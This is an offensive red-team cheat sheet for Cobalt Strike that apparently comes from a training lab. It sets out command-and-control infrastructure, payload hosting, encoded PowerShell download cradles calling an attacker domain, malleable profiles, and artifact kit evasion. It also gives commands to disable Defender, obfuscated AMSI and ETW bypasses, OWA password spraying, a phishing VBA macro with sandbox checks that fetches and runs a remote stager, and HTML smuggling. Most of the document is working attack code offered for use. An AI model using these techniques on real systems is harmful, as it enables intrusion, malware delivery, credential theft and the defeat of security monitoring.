Miscellaneous & Command & Control Infrastructure#
Quick Commands#
Usage: Essential utilities for payload hosting and network testing.
# Host payloads using Python HTTP server
$ python3 -m http.server 80
# Alternative: Use updog for better file upload capabilities
$ updog -p 80 --ssl
# Test outbound connectivity to TeamServer
beacon> powerpick Invoke-WebRequest -Uri http://nickelviper.com/a -UseBasicParsing
# Firewall management (modern syntax with improved OPSEC)
beacon> powerpick New-NetFirewallRule -DisplayName "Windows Update" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080 -Program "C:\Windows\System32\svchost.exe"
beacon> powerpick Remove-NetFirewallRule -DisplayName "Windows Update"
# List existing firewall rules for reconnaissance
beacon> powerpick Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'} | select DisplayName,Direction,Action | ft -AutoSize
Payload Encoding#
Usage: Encode PowerShell payloads to bypass command-line restrictions and handle special characters.
# PowerShell method (UTF-16LE encoding required)
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# Linux method (recommended for accuracy)
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
# Execute encoded payload
powershell -nop -w hidden -enc <BASE64_ENCODED_PAYLOAD>
# Modern alternative: Use EncodedCommand parameter
powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <BASE64>
# OPSEC Note: Encoded commands are flagged by modern EDR. Consider alternatives:
# - Direct download cradles with AMSI bypass
# - Beacon Object Files (BOFs) for post-exploitation
# - Remote process injection instead of new PowerShell processes
Command & Control#
DNS Configuration for DNS Beacon#
Usage: Configure DNS infrastructure for covert C2 channels.
# DNS record setup (where IP points to TeamServer)
@ | A | 10.10.5.50
ns1 | A | 10.10.5.50
cdn | NS | ns1.nickelviper.com
# Verify DNS configuration (should return 0.0.0.0 for non-beacon queries)
$ dig @ns1.nickelviper.com test.cdn.nickelviper.com +short
$ nslookup test.cdn.nickelviper.com ns1.nickelviper.com
# Use cdn.nickelviper.com as DNS Host (Stager) in Listener Configuration
# OPSEC: DNS beacons generate predictable patterns; monitor query volume
# Advanced: DNS over HTTPS (DoH) configuration for better evasion
# Configure in malleable C2 profile:
dns-beacon {
set dns_idle "8.8.8.8"; # Legitimate DNS for idle queries
set dns_sleep "0"; # No sleep between queries
set maxdns "255"; # Maximum DNS TXT record size
set dns_stager_prepend ".stage.";
set dns_stager_subhost ".nickelviper.com";
set dns_max_txt "252";
set dns_ttl "5";
}
TeamServer Setup#
Manual Start#
# Start TeamServer with custom C2 profile
$ sudo ./teamserver 10.10.5.50 'StrongP@ssw0rd!' c2-profiles/normal/webbug.profile
# OPSEC: Always use strong passwords and custom profiles
# Validate profile before starting
$ ./c2lint c2-profiles/normal/webbug.profile
# Enable additional logging for debugging
$ sudo ./teamserver 10.10.5.50 'StrongP@ssw0rd!' c2-profiles/normal/webbug.profile >> /var/log/cobaltstrike.log 2>&1
Service Configuration#
Usage: Run TeamServer as a persistent systemd service with automatic restart.
# Create systemd service file with improved security
$ sudo vim /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network-online.target
Wants=network-online.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=10
User=root
WorkingDirectory=/opt/cobaltstrike
ExecStart=/opt/cobaltstrike/teamserver 10.10.5.50 'StrongP@ssw0rd!' /opt/cobaltstrike/profiles/custom.profile
StandardOutput=append:/var/log/cobaltstrike/teamserver.log
StandardError=append:/var/log/cobaltstrike/teamserver-error.log
# Security hardening
NoNewPrivileges=false
PrivateTmp=true
ProtectSystem=strict
ReadWritePaths=/opt/cobaltstrike
[Install]
WantedBy=multi-user.target
# Create log directory
$ sudo mkdir -p /var/log/cobaltstrike
# Service management
$ sudo systemctl daemon-reload
$ sudo systemctl enable teamserver.service
$ sudo systemctl start teamserver.service
$ sudo systemctl status teamserver.service
# View logs
$ sudo journalctl -u teamserver.service -f
Automated Web Delivery Setup#
Usage: Automatically host payloads using Aggressor Script in headless mode.
# Create host_payloads.cna script (improved version)
$ cat > host_payloads.cna << 'EOF'
# Auto-host payloads on teamserver start
on ready {
println("[+] Teamserver ready, hosting payloads...");
# Generate stageless x64 PowerShell payload
$payload = artifact_payload("http", "powershell", "x64");
# Host on multiple URIs for redundancy
site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "PowerShell Stager", false);
site_host("10.10.5.50", 80, "/updates", $payload, "text/plain", "Updates Endpoint", false);
# Generate and host HTA payload
$hta = artifact_payload("http", "hta", "x64");
site_host("10.10.5.50", 80, "/invoice.hta", $hta, "application/hta", "HTA Payload", false);
println("[+] Payloads hosted successfully");
}
EOF
# Update systemd service to load script
ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /opt/cobaltstrike/agscript 127.0.0.1 50050 headless StrongP@ssw0rd! /opt/cobaltstrike/scripts/host_payloads.cna &'
# OPSEC: Rotate URIs regularly and use realistic naming conventions
Custom C2 Profile#
Usage: Enhanced malleable C2 profile with current browser fingerprinting and improved evasion.
# Modern C2 Profile - Updated 2024
# Mimics Chrome 120+ on Windows 11
set sleeptime "10000"; # 10 seconds
set jitter "30"; # 30% jitter for irregular beaconing
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36";
set host_stage "false"; # Disable staging for better OPSEC
# Process injection configuration
post-ex {
set amsi_disable "true";
# Modern process targets (Windows 10/11)
set spawnto_x86 "%windir%\\syswow64\\wermgr.exe"; # Windows Error Reporting
set spawnto_x64 "%windir%\\sysnative\\wermgr.exe";
# Alternative OPSEC-safe targets
# set spawnto_x86 "%windir%\\syswow64\\SearchProtocolHost.exe";
# set spawnto_x64 "%windir%\\sysnative\\RuntimeBroker.exe";
set pipename "mojo.###.###.###"; # Chrome DevTools pipe pattern
set keylogger "GetAsyncKeyState";
# Obfuscate post-ex jobs
set obfuscate "true";
set smartinject "true";
}
# Process execution controls
process-inject {
set allocator "NtMapViewOfSection"; # Better than VirtualAllocEx
set min_alloc "16700";
set startrwx "false";
set userwx "false";
transform-x86 {
prepend "\x90\x90"; # NOP sled
}
transform-x64 {
prepend "\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread-s;
CreateRemoteThread;
}
}
# HTTP GET Configuration
http-get {
set uri "/api/v2/metrics /cdn-cgi/challenge /static/chunks";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.9";
header "Accept-Encoding" "gzip, deflate, br";
header "Sec-Fetch-Dest" "document";
header "Sec-Fetch-Mode" "navigate";
header "Sec-Fetch-Site" "none";
header "Sec-Ch-Ua" "\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"";
header "Sec-Ch-Ua-Mobile" "?0";
header "Sec-Ch-Ua-Platform" "\"Windows\"";
header "Upgrade-Insecure-Requests" "1";
parameter "session" "random";
parameter "v" "1.0";
metadata {
base64url;
prepend "session=";
header "Cookie";
}
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Server" "cloudflare";
header "X-Frame-Options" "SAMEORIGIN";
header "X-Content-Type-Options" "nosniff";
header "Strict-Transport-Security" "max-age=31536000";
header "CF-Ray" "8a1b2c3d4e5f6g7h-LAX";
output {
netbios;
prepend "{\"status\":\"success\",\"data\":\"";
append "\",\"timestamp\":" "1704067200}";
print;
}
}
}
# HTTP POST Configuration
http-post {
set uri "/api/v2/events /graphql /cdn-cgi/trace";
set verb "POST";
client {
header "Content-Type" "application/json";
header "Accept" "*/*";
header "Accept-Encoding" "gzip, deflate, br";
header "Sec-Fetch-Dest" "empty";
header "Sec-Fetch-Mode" "cors";
header "Sec-Fetch-Site" "same-origin";
id {
base64url;
prepend "{\"client_id\":\"";
append "\",\"events\":[";
print;
}
output {
base64url;
prepend "{\"type\":\"interaction\",\"data\":\"";
append "\"}]}";
print;
}
}
server {
header "Content-Type" "application/json";
header "Server" "cloudflare";
header "Access-Control-Allow-Origin" "*";
output {
netbios;
prepend "{\"success\":true,\"message\":\"";
append "\"}";
print;
}
}
}
# HTTP Stager Configuration
http-stager {
set uri_x86 "/js/bundle-x86.js";
set uri_x64 "/js/bundle-x64.js";
client {
header "Accept" "*/*";
header "Accept-Encoding" "gzip, deflate, br";
header "Sec-Fetch-Dest" "script";
header "Sec-Fetch-Mode" "no-cors";
}
server {
header "Content-Type" "application/javascript; charset=utf-8";
header "Server" "cloudflare";
header "Cache-Control" "public, max-age=31536000";
output {
print;
}
}
}
# HTTPS Certificate Configuration
https-certificate {
set CN "cloudflare.com";
set O "Cloudflare, Inc.";
set C "US";
set L "San Francisco";
set OU "Engineering";
set ST "California";
set validity "365";
}
# Code signing certificate (if available)
code-signer {
set keystore "keystore.jks";
set password "password123";
set alias "codesign";
}
# SMB Beacon Configuration
set pipename "msagent_###"; # Mimics Microsoft telemetry
set pipename_stager "status_##";
# TCP Beacon Configuration
set tcp_port "4444";
# DNS Beacon Configuration (if using DNS)
dns-beacon {
set dns_idle "8.8.8.8";
set dns_max_txt "252";
set dns_sleep "0";
set dns_stager_prepend ".stage.";
set dns_stager_subhost ".nickelviper.com";
set dns_ttl "5";
set maxdns "255";
}
Initial Access & Evasion#
Artifact Kit Compilation#
Usage: Compile custom artifact kit to evade signature-based detection.
# Modern Artifact Kit compilation (Cobalt Strike 4.5+)
$ cd /opt/cobaltstrike/arsenal-kit/kits/artifact
# Compile with custom allocator and syscalls
$ ./build.sh pipe NtMapViewOfSection 310272 5 true false /opt/cobaltstrike/artifacts
# Parameters explained:
# - pipe: Named pipe for communication
# - NtMapViewOfSection: Memory allocator (stealthier than VirtualAlloc)
# - 310272: Stageless payload max size (adjust based on your beacon)
# - 5: XOR iterations
# - true: Enable syscalls (better OPSEC)
# - false: Disable sleep mask obfuscation (enable if needed)
# Compile Resource Kit for script artifacts
$ cd /opt/cobaltstrike/arsenal-kit/kits/resource
$ ./build.sh /opt/cobaltstrike/resources
# OPSEC Note: Recompile artifacts for each engagement
# Modern EDR uses behavioral analytics, not just signatures
# Alternative: Use custom obfuscators
$ cd /opt/cobaltstrike/arsenal-kit/kits/artifact
# Edit src-common/bypass-pipe.c to add custom evasion logic
# Example: Add timing checks, sandbox detection, API hashing
Payload Testing & Validation#
Usage: Test payloads against current AV/EDR before deployment.
# Test executable payload with ThreatCheck
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Release\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe -e Defender
# Modern alternative: AMSITrigger for PowerShell scripts
PS> C:\Tools\AMSITrigger\AMSITrigger.exe -i C:\Payloads\http_x64.ps1 -f 3
# Test against AMSI
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Release\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
# Advanced: Test with DefenderCheck (identifies specific signatures)
PS> C:\Tools\DefenderCheck\DefenderCheck.exe C:\Payloads\beacon.exe
# Automated payload generation in Cobalt Strike
# Load custom CNA script for automatic obfuscation
beacon> load /opt/cobaltstrike/scripts/payload-generator.cna
# Generate all stageless payloads with obfuscation
# Cobalt Strike > Payloads > Windows Stageless Generate All Payloads
# Enable: Obfuscate, Sign Binary (if cert available), Artifact Kit
# OPSEC: Always test on isolated VM with target AV/EDR before live deployment
C2 Profile AMSI & ETW Configuration#
Usage: Configure malleable profile for advanced evasion.
# Enhanced post-exploitation configuration
post-ex {
# AMSI bypass for powerpick, execute-assembly, psinject
set amsi_disable "true";
# Patch ETW (Event Tracing for Windows) - Critical for modern evasion
set etw_disable "true"; # Available in CS 4.5+
# Smart process injection (avoids cross-session injection)
set smartinject "true";
# Obfuscate post-ex DLLs
set obfuscate "true";
# Modern spawn targets (Windows 10 22H2+)
set spawnto_x86 "%windir%\\syswow64\\wermgr.exe";
set spawnto_x64 "%windir%\\sysnative\\wermgr.exe";
# Alternative low-profile processes
# set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
# set spawnto_x64 "%windir%\\sysnative\\backgroundTaskHost.exe";
# Named pipe obfuscation (mimics legitimate Windows pipes)
set pipename "mojo.###.###.###"; # Chrome pipes
# set pipename "crashpad_###_###"; # Chromium crash reporting
# set pipename "PSHost.###.###.###"; # PowerShell remoting
# Keylogger method
set keylogger "SetWindowsHookEx"; # Less detected than GetAsyncKeyState
}
# Process injection advanced configuration
process-inject {
# Use indirect syscalls for injection
set allocator "NtMapViewOfSection"; # Stealthier than VirtualAllocEx
set min_alloc "17500"; # Minimum allocation size
set startrwx "false"; # Don't start with RWX memory
set userwx "false"; # Don't use RWX pages
# Prepend padding to avoid signature detection
transform-x86 {
prepend "\x90\x90\x90"; # NOP sled
}
transform-x64 {
prepend "\x90\x90\x90";
}
# Execution methods (order matters)
execute {
CreateThread "ntdll!RtlUserThreadStart+0x1000"; # Offset from common detection
CreateThread;
NtQueueApcThread-s; # Self-injection via APC
CreateRemoteThread;
RtlCreateUserThread;
}
}
# Memory protection configuration
stage {
set userwx "false";
set cleanup "true"; # Clean up after staging
set stomppe "true"; # Stomp PE headers
set obfuscate "true"; # Obfuscate beacon in memory
set sleep_mask "true"; # Mask beacon when sleeping
# Module stomping (overwrite legitimate DLL in memory)
set module_x86 "wwanmm.dll"; # Rarely loaded Windows DLL
set module_x64 "wwanmm.dll";
# Transform stage before sending
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "EntryPoint";
strrep "beacon.dll" "msvcrt.dll";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "EntryPoint";
strrep "beacon.x64.dll" "ntdll.dll";
}
}
Verify C2 profile syntax:
$ ./c2lint /opt/cobaltstrike/profiles/custom.profile
# Test profile with c2concealer for OpSec improvements
$ python3 c2concealer.py --hostname nickelviper.com --profile custom.profile --variant 1
Note: amsi_disable and etw_disable only affect:
- ✅
powerpick(unmanaged PowerShell runspace) - ✅
execute-assembly(.NET assembly execution) - ✅
psinject(PowerShell injection) - ❌ NOT
powershellcommand (uses system PowerShell)
Process Spawning Configuration (Runtime)#
Usage: Configure spawn-to processes dynamically per engagement.
# Set spawn-to processes at runtime (per beacon)
beacon> spawnto x64 %windir%\sysnative\wermgr.exe
beacon> spawnto x86 %windir%\syswow64\wermgr.exe
# Verify current configuration
beacon> spawnto
# Alternative OPSEC-safe processes for different scenarios
# Standard user processes:
beacon> spawnto x64 %windir%\sysnative\backgroundTaskHost.exe
beacon> spawnto x86 %windir%\syswow64\backgroundTaskHost.exe
# System processes (requires elevation):
beacon> spawnto x64 %windir%\sysnative\svchost.exe -k netsvcs
beacon> spawnto x86 %windir%\syswow64\svchost.exe -k LocalService
# Configure default process for lateral movement
beacon> argue wermgr.exe # Set arguments for spawned process
beacon> ppid 4132 # Set parent PID (PPID spoofing)
# OPSEC: Choose processes that:
# 1. Regularly spawn children (e.g., wermgr.exe, RuntimeBroker.exe)
# 2. Match expected network behavior
# 3. Run under same privilege level as current beacon
Windows Defender Management#
Usage: Disable or evade Windows Defender (requires admin privileges).
# Check current Defender status
beacon> powerpick Get-MpPreference | select DisableRealtimeMonitoring,DisableIOAVProtection,DisableBehaviorMonitoring | fl
beacon> powerpick Get-MpComputerStatus | select RealTimeProtectionEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled | fl
# Disable Defender Real-Time Protection (requires admin)
beacon> powerpick Set-MpPreference -DisableRealtimeMonitoring $true
beacon> powerpick Set-MpPreference -DisableIOAVProtection $true
beacon> powerpick Set-MpPreference -DisableIntrusionPreventionSystem $true
beacon> powerpick Set-MpPreference -DisableBehaviorMonitoring $true
beacon> powerpick Set-MpPreference -DisableScriptScanning $true
beacon> powerpick Set-MpPreference -DisableBlockAtFirstSeen $true
# Add exclusions (stealthier than disabling)
beacon> powerpick Add-MpPreference -ExclusionPath "C:\ProgramData"
beacon> powerpick Add-MpPreference -ExclusionProcess "wermgr.exe"
beacon> powerpick Add-MpPreference -ExclusionExtension "dll"
# OPSEC Alternative: Tamper Protection bypass via Registry (Windows 10/11)
beacon> shell reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
# Disable Windows Defender service entirely (highly suspicious)
beacon> shell sc config WinDefend start= disabled
beacon> shell sc stop WinDefend
# Modern approach: Use Living-off-the-Land to manipulate Defender
beacon> shell "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
# Check for Defender for Endpoint (EDR)
beacon> powerpick Get-Service -Name Sense | fl
beacon> shell sc query Sense
# CRITICAL OPSEC NOTE:
# Disabling Defender triggers alerts in managed environments
# Better approach: Use evasion techniques instead of disabling
# - AMSI bypass for in-memory execution
# - ETW patching for telemetry evasion
# - Process hollowing/module stomping
AMSI Bypass Techniques#
Usage: Bypass Antimalware Scan Interface for in-memory execution.
# Method 1: Classic AmsiInitFailed bypass (patched in recent Windows)
beacon> powerpick S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Method 2: Modern AMSI bypass via memory patching (2023+)
beacon> powerpick [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 3: Matt Graeber's reflection bypass (more reliable)
beacon> powerpick [Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils').GetField('am'+'siInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 4: Advanced - Patch amsi.dll in memory
beacon> powerpick $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
# Method 5: Using BOF (Beacon Object File) - Most OPSEC safe
# Download from: https://github.com/rsmudge/CVE-2020-0796-BOF
beacon> inline-execute /opt/bofs/amsi_patch.o
# Method 6: Force AMSI to fail via COM hijacking
beacon> powerpick $amsiContext = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076); [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, $amsiContext)
# OPSEC Note: Modern Windows 11 with Defender for Endpoint detects AMSI bypass
# Better approach: Use Cobalt Strike's built-in AMSI bypass via C2 profile
# amsi_disable "true" + powerpick command
# Verify AMSI status (test with known malicious string)
beacon> powerpick 'AMSIScanBuffer'
# Alternative: Use Invoke-Obfuscation for script-level evasion
# https://github.com/danielbohannon/Invoke-Obfuscation
ETW (Event Tracing for Windows) Bypass#
Usage: Disable ETW to prevent telemetry collection (modern EDR evasion).
# Method 1: Patch ETW via PowerShell reflection
beacon> powerpick [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
# Method 2: ETW patching via BOF (recommended)
# Download: https://github.com/boku7/injectEtwBypass
beacon> inline-execute /opt/bofs/etw_patch.o
# Method 3: Use NtTraceControl to disable ETW
beacon> execute-assembly C:\Tools\SharpEtwDisable\SharpEtwDisable.exe
# Method 4: Cobalt Strike C2 profile (best OPSEC)
# Add to malleable profile:
# post-ex {
# set etw_disable "true";
# }
# Verify ETW is disabled
beacon> powerpick Get-EtwTraceProvider -Guid "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}" | fl
# CRITICAL: ETW bypass is essential for:
# - .NET assembly execution (execute-assembly)
# - PowerShell post-exploitation
# - Process injection activities
Initial Compromise Techniques#
OWA/Exchange Enumeration & Password Spraying#
Usage: Identify valid users and conduct targeted password attacks.
# 1. Identify mail infrastructure
$ dig cyberbotic.io MX
$ dig autodiscover.cyberbotic.io
$ nmap -p 443,587,993 --script http-ntlm-info mail.cyberbotic.io
# Modern: Check for Microsoft 365
$ curl -s https://login.microsoftonline.com/getuserrealm.srf?login=user@cyberbotic.io | jq
# 2. Enumerate NetBIOS/Domain via OWA
PS> Import-Module C:\Tools\MailSniper\MailSniper.ps1
PS> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
# 3. Generate username list from OSINT
$ python3 namemash.py employees.txt > usernames.txt
# 4. Validate usernames (timing-based enumeration)
PS> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\usernames.txt -OutFile .\valid.txt -Threads 5
# Modern alternative: Use o365spray (supports MFA detection)
$ python3 o365spray.py --validate -U usernames.txt --domain cyberbotic.io
# 5. Password spraying (OPSEC-aware)
PS> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\valid.txt -Password "Summer2024!" -Threads 1 -Delay 3600
# Modern: Use o365spray with throttling
$ python3 o365spray.py --spray -U valid.txt -P passwords.txt --domain cyberbotic.io --rate 10 --safe 120
# 6. Download Global Address List (requires valid credentials)
PS> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName "cyberbotic.io\jdoe" -Password "Summer2024!" -OutFile .\gal.txt
# OPSEC Considerations:
# - Space requests 1 hour apart to avoid lockout
# - Use <5 password attempts per user per day
# - Monitor for account lockout thresholds
# - Consider using residential proxies to avoid geo-blocks
# - Check for Conditional Access Policies (Azure AD)
Malicious Office Macro#
Usage: Create VBA macro for initial access via phishing.
' Modern macro with sandbox detection and staged execution
' OPSEC: Combine with thread execution hijacking or DLL sideloading
Sub AutoOpen()
' Sandbox detection
If DetectSandbox() Then
Exit Sub
End If
' Check if running in user context
If Environ("USERNAME") = "Administrator" Or Environ("USERNAME") = "admin" Then
Exit Sub
End If
' Execute payload
ExecutePayload
End Sub
Sub Workbook_Open()
AutoOpen
End Sub
Function DetectSandbox() As Boolean
On Error Resume Next
DetectSandbox = False
' Check for low RAM (VMs often have <2GB)
If CreateObject("WScript.Shell").Environment("SYSTEM")("NUMBER_OF_PROCESSORS") < 2 Then
DetectSandbox = True
Exit Function
End If
' Check for recent file activity
If Dir("C:\Users\" & Environ("USERNAME") & "\Documents\*.docx") = "" Then
DetectSandbox = True
Exit Function
End If
' Time-based delay (sandboxes timeout quickly)
Dim StartTime As Double
StartTime = Timer
Do While Timer < StartTime + 90 ' 90 second delay
DoEvents
Loop
End Function
Sub ExecutePayload()
Dim objShell As Object
Dim strCommand As String
Set objShell = CreateObject("WScript.Shell")
' Method 1: PowerShell download cradle (requires AMSI bypass)
strCommand = "powershell.exe -nop -w hidden -ep bypass -c ""IEX(New-Object Net.WebClient).DownloadString('http://nickelviper.com/stage1')"""
' Method 2: mshta for HTA execution (alternative)
' strCommand = "mshta.exe http://nickelviper.com/payload.hta"
' Method 3: certutil for file download + execution
' strCommand = "cmd.exe /c certutil -urlcache -f http://nickelviper.com/update.exe %TEMP%\svchost.exe && %TEMP%\svchost.exe"
' Execute with hidden window
objShell.Run strCommand, 0, False
Set objShell = Nothing
End Sub
Modern alternatives to VBA macros:#
# 1. Excel 4.0 XLM Macros (bypasses modern macro security)
# Use tool: https://github.com/outflanknl/EvilClippy
$ python EvilClippy.py -s payload.txt invoice.xlsm
# 2. OneNote attachments with embedded executables
# OneNote files (.one) allow embedded files with minimal warnings
# 3. ISO/IMG files with LNK + payload
# Windows 11 mounts ISO files automatically
$ genisoimage -o payload.iso -J -r payload_folder/
# 4. HTML Smuggling (bypasses email gateways)
<script>
var blob = new Blob([atob("TVqQAAMAAAAEAAAA...")], {type: 'application/octet-stream'});
var url = window.URL.createObjectURL(blob);
var a = document.createElement('a');
a.href = url;
a.download = 'invoice.exe';
a.click();
</script>
# 5. Container files (.7z, .rar) with password "infected"
# Bypasses most email scanning (password-protected archives)
$ 7z a -pinfected -mhe=on payload.7z beacon.exe